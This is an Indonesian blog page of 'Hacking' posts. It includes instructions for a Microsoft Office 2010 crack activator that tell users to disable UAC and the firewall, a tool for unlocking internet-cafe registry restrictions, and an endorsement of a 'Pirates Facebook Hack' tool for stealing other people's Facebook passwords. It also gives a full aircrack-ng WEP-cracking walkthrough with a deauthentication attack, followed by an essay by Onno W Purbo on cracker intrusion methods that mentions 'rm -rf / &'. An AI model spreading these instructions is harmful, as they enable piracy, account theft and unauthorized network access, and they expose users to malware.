Tampilkan postingan dengan label Hacking. Tampilkan semua postingan

Activator MS Office 2010 Plus

0
20.49
Posted Image

Crack Activator Microsoft Office 2010 Plus | 5.02 Mb

The Version Of Office 2010 That Supports The Activator:

Microsoft Office Professional Plus 2010 32-Bit/64-Bit (Version Retail And VL)
Microsoft Visio Professional 2010 32-Bit/64-Bit (Version Retail And VL)
Microsoft Project Professional 2010 32-Bit/64-Bit (Version Retail And VL)
Activation-Feautures:

Fully Automated Activation Process.
Automatic Notification Appears If UAC In Windows 7,Not Vista Or Windows
Server 2008 Off.At The Same Time After Clicking Yes Will Turn Off And Restart
Activation Duration Is 180 Days.Then Run It Again And It Works Without Problems.
Usage:

- Turn Off UAC,And Firewall.
- First Run The Activator With Admin Rights And Than Activate It.

Appearance Dialog Box Asking You Are You Sure That Your Running With Admin Rights.
Than Click Yes Confirm It With Yes,If You Do Not Disable The UAC Dialog Will Appear
Asking You Click Yes At The Same Time Automatically Than Restart The Computer.
After You Restart The Computer To Return The Activation Conduct As Step 2
You Can Not Read This Section If The Machine Is Switched Off UAC)
Activation Process Will Run Automatically But You Should Note The Steps
It Will Bow Out Information On Active Readers Immediately See If The Line
Is What Is License Licensed Status Means OK Also Other Letters Is Not.
If Your Computer Has Installed The Third Set Of Microsoft Office Professional Plus 2010,
Microsoft Visio 2010 Professional,Microsoft Project 2010 Professional,
Then Please Note That Three Lines Of License Status Fraud See Which
Were Activated And Which Is Not Activated.
Note:

This Step Should Only Do If You Are Using Windows 64-Bit And If You Have
Office 2010 Retail 64-Bit Installed On Your System.For The Rest You Have To Do This Step.
After Completion Of All Activated (License Licensed Status In Most States),
Then You Proceed To Load The Registry Files In The File
Name Is (fix64bit.reg) Than Open The Software Up And Check The Status Of Activation.

Translate :


Penggerak Crack Microsoft Office 2010 Plus | 5,02 Mb

Versi Dari Office 2010 Hal Mendukung Activator ini:

Microsoft Office Professional Plus 2010 32-Bit/64-Bit (Versi Ritel Dan VL)
Microsoft Visio Professional 2010 32-Bit/64-Bit (Versi Ritel Dan VL)
Microsoft Project Profesional 2010 32-Bit/64-Bit (Versi Ritel Dan VL)
Aktivasi-Feautures:

Sepenuhnya otomatis Proses Aktivasi.
Pemberitahuan Otomatis Muncul Jika UAC Pada Windows 7, Tidak Vista Atau Windows
Server 2008 Off.At The Time Sama Setelah Mengklik Ya Will Turn Off dan Restart
Jangka waktu 180 Aktivasi Apakah Days.Then Jalankan Ini Lagi Dan Bekerja Tanpa Masalah.
Penggunaan:

- Matikan UAC, dan Firewall.
- Pertama Jalankan The Activator Dengan Hak Admin Dan Than Aktifkan ini.

Penampilan Kotak Dialog Meminta Anda Apakah Anda Yakin Bahwa Anda Menjalankan Dengan Hak Admin.
Than Klik Ya Konfirmasi Ini Dengan Ya, Jika Anda Tidak Nonaktifkan Dialog UAC Akan Muncul
Meminta Anda Klik Ya At The Same Time Restart Komputer Otomatis Than The.
Setelah Anda Restart Komputer The Untuk Return Perilaku Aktivasi Sebagai Langkah 2
Anda Tidak Bisa Baca Bagian ini Jika Machine Is Switched Off UAC)
Proses Aktivasi Akan Jalankan Otomatis Tapi Anda Harus Catatan Langkah
Ini akan Bow Out Informasi Pada Pembaca Aktif Segera Lihat apakah Jalur
Apakah Apa Lisensi Status Izin Berarti OK Juga Surat Lain Bukan.
Jika Komputer Anda Telah Terpasang Set Ketiga Dari Microsoft Office Professional Plus 2010,
Microsoft Visio 2010 Professional, Project Profesional 2010 Microsoft,
Kemudian Harap Catatan Itu Tiga Lines Dari Penipuan Lisensi Status Lihat Manakah
Apakah aktif Dan Yang Tidak Diaktifkan.
Catatan:

Langkah ini Hanya Harus Dilakukan Jika Anda menggunakan Windows 64-Bit Dan Jika Anda Memiliki
Office 2010 Retail 64-Bit Dipasang Pada System.For Anda The Rest Anda Memiliki Langkah ini.
Setelah Penyelesaian Dari Semua (Status Lisensi Berlisensi Di Amerika Paling) Diaktifkan,
Kemudian Anda Lakukan Untuk loading Files Registry Dalam File The
Nama Apakah (fix64bit.reg) Than Terbuka Up Software Dan Periksa Status Dari Aktivasi.



.::KLICK HERE FOR DOWNLOAD::.

Cara Bobol Registry Di Warnet yang di Block Admin / WinLock

0
15.08
Bagi kalian yang kesel suka maen warnet tapi sering di blog saya ada software untuk menjebolnya.


Kalian bisa pake Unlock Them All.

Cara pake tinggal UnChek yang mau di buka..
Setelah itu klik tombol "Change!" akan ada peringatan seperti ini.



Klik "Yes"

Trus ada lagi ini :



Klik "Yes"

Setelah itu semuanya beres..


Bagi yang mau Donlot Unlock Them All-nya KLIK DISINI!!!

SELAMAT MENCOBA :D

Mempercepat koneksi Mozilla Firefox.

2
10.48

Okeeeh update lagi ,, gw mw kasih tw caranya buat koneksi Firefox lo yg lemot jadi super kenceng. Jaman sekarang emang banyak bener yang bisa di Hack,,, sperti yang akan gw kasih tw skarang adalah cara Hack Firefox. Kalau lo mw ikutin aja cara-cara di bawah ini :

1. Buka Mozilla.

2. Ketikan di addres bar “about:config” (tanpa tanda patik).

3. Scroll mouse anda kebawah dan cari “network.http.max-connections“, double klik dan masukan nilai “64“.

4. Cari “network.http.max-connections-per-server“, double klik dan masukan nilai “21“.

5. Cari ‘network.http.max-persistent-connections-per-server“, double klik dan masukan nilai “8“.

6. Doube klik pada “network.http.pipelining ” menjadi “true“.

7. Cari “network.http.pipelining.maxrequests“, double klik dan masukan nilai “100“.

8. Double klik pada “network.http.proxy.pipelining” menjadi “true“.

9. Langkah terakhir, klik kanan dimana saja pilih : New >> integrar >> lalu tulis “nglayout.initialpaint.delay” (tanpa tanda petik”. Kemudian masukan nilai “0“.


Setelah itu serah lo aja,,, skrng koneksi lo Super Cepet ...


Selamat mencoba.




Cara Hack Facebook dengan Pirates Facebook Hack V.1.4

4
19.38
http://i588.photobucket.com/albums/ss322/eerulls/untitled.jpg
Jika anda pernah merasa kesal dengan orang atau teman anda yang menjahili anda dengan membobol facebook anda. Saya akan memberitahukan kepada anda cara untuk membobol (Hack) facebook orang lain dengan menggunakan software yang bernama : Pirates Facebook Hack v.1.4 . Software ini memiliki tingkat yang sangat kecil intuk gagal mendapatkan Password facebook orang lain. dan saya yakin anda bisa berhasil dengan tool ini . Sebelum itu tool ini meminta password sebelum anda bisa membukanya yaitu a1b . (untuk melihat password anda harus memblock semua tulisan)

Pirates facebook hack v 1.4 (password :a1b)

video tutorial





Hacking Wireless II: Menembus Pertahanan WEP Keys

0
19.37



Menembus Pertahanan WEP Keys:

  1. Jalankan BackTrack.

  1. Reset driver wireless. Ketikkan:

#airmon-ng -> cek interface ath yang aktif

#airmon-ng stop ath0

#airmon-ng stop ath1 -> bila ath1 aktif

#airmon-ng start wifi0

  1. Buka 3 buah console.

  1. Console 1, ketikkan:

#airodump-ng ath0 -> scanning hotspot yang aktif.

#airodump-ng --channel 11 --bssid 00:0E:2E:C2:2C:0E -w target ath0

Keterangan:

Proses ini untuk mengcapture informasi dapat membantu dalam menembus WE

P Key.

--bssid -> MAC-Address dari AP yang akan di crack

-w target -> hasil capture ini akan disimpan di file yang namanya target

  1. Console 2, ketikkan:

Untuk membantu menciptakan pengumpulan paket data

#aireplay-ng --arpreplay -b 00:0E:2E:C2:2C:0E -h 00:0E:2E:C1:1E:83 ath0

Keterangan:

-b -> MAC-Address dari AP.

-h -> MAC-Address dari client yang aktif terhubung ke AP.

  1. Console 3, ketikkan:

Untuk mempercepat pengumpulan paket data, dilakukan serangan deauthentication ke client.

#aireplay-ng --deauth 2 -c 00:0E:2E:C1:1E:83 -a 00:0E:2E:C2:2C:0E ath0

Keterangan:

-c -> MAC-Address dari Client

-a -> MAC-Address dari AP

  1. Setelah terkumpul paket data yang cukup, dilakukan cracking:

#aircrack-ng target*.cap

Maka dapat kita lihat hasil WEP Key yang berhasil didapatkan.


By: Destana Dwi Maulidani & Wilis


Belajar Nge-Hack

1
19.29

Hacker dengan keahliannya dapat melihat & memperbaiki kelemahan perangkat lunak di komputer; biasanya kemudian di publikasikan secara terbuka di Internet agar sistem menjadi lebih baik. Sialnya, segelintir manusia berhati jahat menggunakan informasi tersebut untuk kejahatan – mereka biasanya disebut cracker. Pada dasarnya dunia hacker & cracker tidak berbeda dengan dunia seni, disini kita berbicara seni keamanan jaringan Internet.

Saya berharap ilmu keamanan jaringan di tulisan ini digunakan untuk hal-hal yang baik – jadilah Hacker bukan Cracker. Jangan sampai anda terkena karma karena menggunakan ilmu untuk merusak milik orang lain. Apalagi, pada saat ini kebutuhan akan hacker semakin bertambah di Indonesia dengan semakin banyak dotcommers yang ingin IPO di berbagai bursa saham. Nama baik & nilai sebuah dotcom bisa jatuh bahkan menjadi tidak berharga jika dotcom di bobol. Dalam kondisi ini, para hacker di harapkan bisa menjadi konsultan keamanan bagi para dotcommers tersebut – karena SDM pihak kepolisian & aparat keamanan Indonesia amat sangat lemah & menyedihkan di bidang Teknologi Informasi & Internet. Apa boleh buat cybersquad, cyberpatrol swasta barangkali perlu di budayakan untuk survival dotcommers Indonesia di Internet.

Berbagai teknik keamanan jaringan Internet dapat di peroleh secara mudah di Internet antara lain di http://www.sans.org, http://www.rootshell.com, http://www.linuxfirewall.org/, http://www.linuxdoc.org, http://www.cerias.purdue.edu/coast/firewalls/, http://www.redhat.com/mirrors/LDP/HOWTO/. Sebagian dari teknik ini berupa buku-buku yang jumlah-nya beberapa ratus halaman yang dapat di ambil secara cuma-cuma (gratis). Beberapa Frequently Asked Questions (FAQ) tentang keamanan jaringan bisa diperoleh di http://www.iss.net/vd/mail.html, http://www.v-one.com/documents/fw-faq.htm. Dan bagi para experimenter beberapa script / program yang sudah jadi dapat diperoleh antara lain di http://bastille-linux.sourceforge.net/, http://www.redhat.com/support/docs/tips/firewall/firewallservice.html.

Bagi pembaca yang ingin memperoleh ilmu tentang jaringan dapat di download secara cuma-cuma dari http://pandu.dhs.org, http://www.bogor.net/idkf/, http://louis.idaman.com/idkf. Beberapa buku berbentuk softcopy yang dapat di ambil gratis dapat di ambil dari http://pandu.dhs.org/Buku-Online/. Kita harus berterima kasih terutama kepada team Pandu yang dimotori oleh I Made Wiryana untuk ini. Pada saat ini, saya tidak terlalu tahu adanya tempat diskusi Indonesia yang aktif membahas teknik-teknik hacking ini – tetapi mungkin bisa sebagian di diskusikan di mailing list lanjut seperti kursus-linux@yahoogroups.com & linux-admin@linux.or.id yang di operasikan oleh Kelompok Pengguna Linux Indonesia (KPLI) http://www.kpli.or.id.

Cara paling sederhana untuk melihat kelemahan sistem adalah dengan cara mencari informasi dari berbagai vendor misalnya di http://www.sans.org/newlook/publications/roadmap.htm#3b tentang kelemahan dari sistem yang mereka buat sendiri. Di samping, memonitoring berbagai mailing list di Internet yang berkaitan dengan keamanan jaringan seperti dalam daftar http://www.sans.org/newlook/publications/roadmap.htm#3e.

Dijelaskan oleh Front-line Information Security Team, “Techniques Adopted By ‘System Crackers’ When Attempting To Break Into Corporate or Sensitive Private Networks,” fist@ns2.co.uk http://www.ns2.co.uk. Seorang Cracker umumnya pria usia 16-25 tahun. Berdasarkan statistik pengguna Internet di Indonesia maka sebetulnya mayoritas pengguna Internet di Indonesia adalah anak-anak muda pada usia ini juga. Memang usia ini adalah usia yang sangat ideal dalam menimba ilmu baru termasuk ilmu Internet, sangat disayangkan jika kita tidak berhasil menginternetkan ke 25000 sekolah Indonesia s/d tahun 2002 – karena tumpuan hari depan bangsa Indonesia berada di tangan anak-anak muda kita ini.

Nah, para cracker muda ini umumnya melakukan cracking untuk meningkatkan kemampuan / menggunakan sumber daya di jaringan untuk kepentingan sendiri. Umumnya para cracker adalah opportunis. Melihat kelemahan sistem dengan mejalankan program scanner. Setelah memperoleh akses root, cracker akan menginstall pintu belakang (backdoor) dan menutup semua kelemahan umum yang ada.

Seperti kita tahu, umumnya berbagai perusahaan / dotcommers akan menggunakan Internet untuk (1) hosting web server mereka, (2) komunikasi e-mail dan (3) memberikan akses web / internet kepada karyawan-nya. Pemisahan jaringan Internet dan IntraNet umumnya dilakukan dengan menggunakan teknik / software Firewall dan Proxy server. Melihat kondisi penggunaan di atas, kelemahan sistem umumnya dapat di tembus misalnya dengan menembus mailserver external / luar yang digunakan untuk memudahkan akses ke mail keluar dari perusahaan. Selain itu, dengan menggunakan agressive-SNMP scanner & program yang memaksa SNMP community string dapat mengubah sebuah router menjadi bridge (jembatan) yang kemudian dapat digunakan untuk batu loncatan untuk masuk ke dalam jaringan internal perusahaan (IntraNet).

Agar cracker terlindungi pada saat melakukan serangan, teknik cloacking (penyamaran) dilakukan dengan cara melompat dari mesin yang sebelumnya telah di compromised (ditaklukan) melalui program telnet atau rsh. Pada mesin perantara yang menggunakan Windows serangan dapat dilakukan dengan melompat dari program Wingate. Selain itu, melompat dapat dilakukan melalui perangkat proxy yang konfigurasinya kurang baik.

Setelah berhasil melompat dan memasuki sistem lain, cracker biasanya melakukan probing terhadap jaringan dan mengumpulkan informasi yang dibutuhkan. Hal ini dilakukan dengan beberapa cara, misalnya (1) menggunakan nslookup untuk menjalankan perintah ‘ls ’ , (2) melihat file HTML di webserver anda untuk mengidentifikasi mesin lainnya, (3) melihat berbagai dokumen di FTP server, (4) menghubungkan diri ke mail server dan menggunakan perintah ‘expn ’, dan (5) mem-finger user di mesin-mesin eksternal lainnya.

Langkah selanjutnya, cracker akan mengidentifikasi komponen jaringan yang dipercaya oleh system apa saja. Komponen jaringan tersebut biasanya mesin administrator dan server yang biasanya di anggap paling aman di jaringan. Start dengan check akses & eksport NFS ke berbagai direktori yang kritis seperti /usr/bin, /etc dan /home. Eksploitasi mesin melalui kelemahan Common Gateway Interface (CGI), dengan akses ke file /etc/hosts.allow.

Selanjutnya cracker harus mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan. Cracker bisa mengunakan program di Linux seperti ADMhack, mscan, nmap dan banyak scanner kecil lainnya. Program seperti ‘ps’ & ‘netstat’ di buat trojan (ingat cerita kuda troya? dalam cerita klasik yunani kuno) untuk menyembunyikan proses scanning. Bagi cracker yang cukup advanced dapat mengunakan aggressive-SNMP scanning untuk men-scan peralatan dengan SNMP.

Setelah cracker berhasil mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan, maka cracker akan menjalan program untuk menaklukan program daemon yang lemah di server. Program daemon adalah program di server yang biasanya berjalan di belakang layar (sebagai daemon / setan). Keberhasilan menaklukan program daemon ini akan memungkinkan seorang Cracker untuk memperoleh akses sebagai ‘root’ (administrator tertinggi di server).

Untuk menghilangkan jejak, seorang cracker biasanya melakukan operasi pembersihan ‘clean-up’ operation dengan cara membersihkan berbagai log file. Dan menambahkan program untuk masuk dari pintu belakang ‘backdooring’. Mengganti file .rhosts di /usr/bin untuk memudahkan akses ke mesin yang di taklukan melalui rsh & csh.

Selanjutnya seorang cracker dapat menggunakan mesin yang sudah ditaklukan untuk kepentingannya sendiri, misalnya mengambil informasi sensitif yang seharusnya tidak dibacanya; mengcracking mesin lain dengan melompat dari mesin yang di taklukan; memasang sniffer untuk melihat / mencatat berbagai trafik / komunikasi yang lewat; bahkan bisa mematikan sistem / jaringan dengan cara menjalankan perintah ‘rm -rf / &’. Yang terakhir akan sangat fatal akibatnya karena sistem akan hancur sama sekali, terutama jika semua software di letakan di harddisk. Proses re-install seluruh sistem harus di lakukan, akan memusingkan jika hal ini dilakukan di mesin-mesin yang menjalankan misi kritis.

Oleh karena itu semua mesin & router yang menjalankan misi kritis sebaiknya selalu di periksa keamanannya & di patch oleh software yang lebih baru. Backup menjadi penting sekali terutama pada mesin-mesin yang menjalankan misi kritis supaya terselamatkan dari ulah cracker yang men-disable sistem dengan ‘rm -rf / &’.

Bagi kita yang sehari-hari bergelut di Internet biasanya justru akan sangat menghargai keberadaan para hacker (bukan Cracker). Karena berkat para hacker-lah Internet ada dan dapat kita nikmati seperti sekarang ini, bahkan terus di perbaiki untuk menjadi sistem yang lebih baik lagi. Berbagai kelemahan sistem di perbaiki karena kepandaian rekan-rekan hacker yang sering kali mengerjakan perbaikan tsb. secara sukarela karena hobby-nya. Apalagi seringkali hasil hacking-nya di sebarkan secara cuma-cuma di Internet untuk keperluan masyarakat Internet. Sebuah nilai & budaya gotong royong yang mulia justru tumbuh di dunia maya Internet yang biasanya terkesan futuristik dan jauh dari rasa sosial.

Pengembangan para hobbiest hacker ini menjadi penting sekali untuk keberlangsungan / survival dotcommers di wahana Internet Indonesia. Sebagai salah satu bentuk nyatanya, dalam waktu dekat Insya Allah sekitar pertengahan April 2001 akan di adakan hacking competition di Internet untuk membobol sebuah server yang telah di tentukan terlebih dahulu. Hacking competition tersebut di motori oleh anak-anak muda di Kelompok Pengguna Linux Indonesia (KPLI) Semarang yang digerakan oleh anak muda seperti Kresno Aji (masaji@telkom.net), Agus Hartanto (hartx@writeme.com) & Lekso Budi Handoko (handoko@riset.dinus.ac.id). Seperti umumnya anak-anak muda lainnya, mereka umumnya bermodal cekak – bantuan & sponsor tentunya akan sangat bermanfaat dan dinantikan oleh rekan-rekan muda ini.

Mudah-mudahan semua ini akan menambah semangat pembaca, khususnya pembaca muda, untuk bergerak di dunia hacker yang mengasyikan dan menantang. Kalau kata Captain Jean Luc Picard di Film Startrek Next Generation, “To boldly go where no one has gone before”.

Penulis: Onno W Purbo